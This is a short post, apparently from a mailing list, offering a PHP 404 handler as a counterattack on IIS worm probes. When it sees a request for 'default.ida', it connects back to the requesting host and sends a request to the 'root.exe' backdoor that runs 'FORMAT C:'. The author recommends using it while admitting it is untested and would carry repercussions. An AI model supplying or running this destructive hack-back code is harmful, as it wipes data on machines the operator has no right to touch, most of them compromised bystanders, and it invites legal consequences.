If anyone is malicious enough, this should format the hard drive of an
infected host who is trying to infect your computer, but only if
you're not running IIS. :)
<?php
if (eregi("default.ida", $REQUEST_URI)) {
$fp = fsockopen ($REMOTE_ADDR, 80, &$errno, &$errstr, 30);
if ($fp) {
fputs ($fp, "GET /scripts/root.exe?/c+FORMAT+C: HTTP/1.0\n\n");
}
}
?>
Just use that as your 404 handler in Apache. Of course, it's not
tested b/c I don't want to go there. There would probably be lots of
repercussions, but it is real scary that this code would probably
actually work.
-Rob
